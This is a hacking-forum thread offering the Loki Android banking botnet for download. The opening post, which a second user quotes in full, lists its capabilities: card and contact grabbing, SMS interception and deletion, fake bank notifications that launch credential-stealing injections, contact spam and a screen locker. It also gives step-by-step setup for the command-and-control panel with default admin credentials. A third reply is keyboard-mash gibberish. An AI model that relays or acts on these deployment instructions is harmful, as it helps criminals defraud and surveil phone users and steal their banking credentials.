Become King Of Hell

Loki Android Botnet Version 2.0 + Banking Injections

xenotic

New member
Joined
Jan 31, 2024
Messages
8
Hellcoins
♆12
Bot features:

- Card grabber
- Install apk
- Spam on user contacts
- Call a number
- Forward incoming calls
- Launch user applications
- Automatic display of fake notifications, with bank icons taken
- Interception, block deletion of incoming SMS, sending, including to short numbers
- Download all user application names
- Contacts grabber
- Screen locker
- Launch pages in browser
- Launch user applications
- Search Application Bank
- Browser history grabber
- Socks5 module
- Spam based on numbers
- Sending USSD
- Killing a bot with disabling admin rights
- Geolocation

- Auto reply SMS

Admin panel:

Detailed statistics on countries, app, url history, sellers, etc.
The ability to issue commands to a specific bot, group, as well as to all newcomers.
Search by imei, sorting by installed applications, online bots, sellers, countries.
Cleaning up old logs.
Separate statistics for traffic.
Jabber notifications.
It is possible to upload your own injects from the admin panel.
Search by SMS, logs.
Search for links by history.
Statistics on tasks that are issued, completed.
Etc.

Additional info:
The size of the bot is 150 kb.
Stable work on Android 4-7.
Root rights are not required for the main work.
Admin rights request.
To change the phone password, admin rights are required (requested during installation).
Changing the password to Android Nougat (Android 7) partially.
Sending and intercepting SMS on all versions, deleting up to 4.4, downloading all SMS from 4.4, blocking SMS over 4.4 via SMS manager / Screen Locker (when blocking via SMS manager, only the holder does not see SMS).
Constant display of bank (fake) notifications with bank icons, the text can be set from the admin panel, when you click on the message, an injection is launched.
Injections of euro countries are available, they are included with the bot.

Usage & Build Method:
Loki admin panel installs instructions:


apt-get update && apt-get upgrade -y
apt-get install apache2 libapache2-mod-php5 mysql-server php5 php5-mysql -y
apt-get install default-jre default-jdk -y

Debian 7:
apt-get install ia32-libs lib32z1 lib32ncurses5 -y

Debian 8:

dpkg --add-architecture i386
apt-get update
apt-get install libstdc++6:i386 libgcc1:i386 zlib1g:i386 libncurses5:i386 lib32z1 lib32ncurses5


Next:

wget https:// raw.githubusercontent.com/iBotPeach...apktool
wget -O apktool.jar https://bitbucket.org/iBotPeaches/apktool/d....4.jar
chmod +x ~/apktool.jar
chmod +x ~/apktool
mv ~/apktool.jar /usr/local/bin/
mv ~/apktool /usr/local/bin/


Next:


extract loki.tar to a new directory. something like this: tar xf loki.tar -C /var/www/
change file owner: chown -R www-data: www-data /var/www/

Run: mysql

create loki database;
grant all privileges on loki.* on loki@localhost specified 'DB_PASSWORD'; grant all privileges on loki.* 'DB_PASSWORD' is defined on loki@localhost;
go out.

file loki4dev.sql BD import:

mysql loki < /var/www/site/ loki 4dev.sql mysql pbolonka1 < /var/www/site/loki4dev.sql root - loki

Edit: /var/www/site/db.php and enter mysql database access:


db: loki
db user: loki
db password: DB_PASSWORD


Done!
Administration panel of the address http://domain/site/ or http://ip_server/site/

login with the name bot4fun and password J1HPbmr

Download Link Of Loki Android Botnet:
[Hidden content]
Thx
 

neatest

New member
Joined
Feb 19, 2024
Messages
14
Hellcoins
♆32
Bot features:

- Card grabber
- Install apk
- Spam on user contacts
- Call a number
- Forward incoming calls
- Launch user applications
- Automatic display of fake notifications, with bank icons taken
- Interception, block deletion of incoming SMS, sending, including to short numbers
- Download all user application names
- Contacts grabber
- Screen locker
- Launch pages in browser
- Launch user applications
- Search Application Bank
- Browser history grabber
- Socks5 module
- Spam based on numbers
- Sending USSD
- Killing a bot with disabling admin rights
- Geolocation

- Auto reply SMS

Admin panel:

Detailed statistics on countries, app, url history, sellers, etc.
The ability to issue commands to a specific bot, group, as well as to all newcomers.
Search by imei, sorting by installed applications, online bots, sellers, countries.
Cleaning up old logs.
Separate statistics for traffic.
Jabber notifications.
It is possible to upload your own injects from the admin panel.
Search by SMS, logs.
Search for links by history.
Statistics on tasks that are issued, completed.
Etc.

Additional info:
The size of the bot is 150 kb.
Stable work on Android 4-7.
Root rights are not required for the main work.
Admin rights request.
To change the phone password, admin rights are required (requested during installation).
Changing the password to Android Nougat (Android 7) partially.
Sending and intercepting SMS on all versions, deleting up to 4.4, downloading all SMS from 4.4, blocking SMS over 4.4 via SMS manager / Screen Locker (when blocking via SMS manager, only the holder does not see SMS).
Constant display of bank (fake) notifications with bank icons, the text can be set from the admin panel, when you click on the message, an injection is launched.
Injections of euro countries are available, they are included with the bot.

Usage & Build Method:
Loki admin panel installs instructions:


apt-get update && apt-get upgrade -y
apt-get install apache2 libapache2-mod-php5 mysql-server php5 php5-mysql -y
apt-get install default-jre default-jdk -y

Debian 7:
apt-get install ia32-libs lib32z1 lib32ncurses5 -y

Debian 8:

dpkg --add-architecture i386
apt-get update
apt-get install libstdc++6:i386 libgcc1:i386 zlib1g:i386 libncurses5:i386 lib32z1 lib32ncurses5


Next:

wget https:// raw.githubusercontent.com/iBotPeach...apktool
wget -O apktool.jar https://bitbucket.org/iBotPeaches/apktool/d....4.jar
chmod +x ~/apktool.jar
chmod +x ~/apktool
mv ~/apktool.jar /usr/local/bin/
mv ~/apktool /usr/local/bin/


Next:


extract loki.tar to a new directory. something like this: tar xf loki.tar -C /var/www/
change file owner: chown -R www-data: www-data /var/www/

Run: mysql

create loki database;
grant all privileges on loki.* on loki@localhost specified 'DB_PASSWORD'; grant all privileges on loki.* 'DB_PASSWORD' is defined on loki@localhost;
go out.

file loki4dev.sql BD import:

mysql loki < /var/www/site/ loki 4dev.sql mysql pbolonka1 < /var/www/site/loki4dev.sql root - loki

Edit: /var/www/site/db.php and enter mysql database access:


db: loki
db user: loki
db password: DB_PASSWORD


Done!
Administration panel of the address http://domain/site/ or http://ip_server/site/

login with the name bot4fun and password J1HPbmr

Download Link Of Loki Android Botnet:
[Hidden content]
Okay good very good product.
 
Joined
Feb 22, 2024
Messages
40
Hellcoins
♆70
sd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddcxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxghffffffffffh kkkkkkkkkkkk kkkkkkkkkkkkkkkkkkkkkk kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkmmmmmmmmmmmmmmmmmmmmnnnnnnnnnnnnnnjjjjjjjjjjjjjjjjjjjhhhhhhhhhhhhhhhhhhhhhhuuuuuuuuuuuuuu uuuuuuuufgff ffffffffffffffffffff
 
Top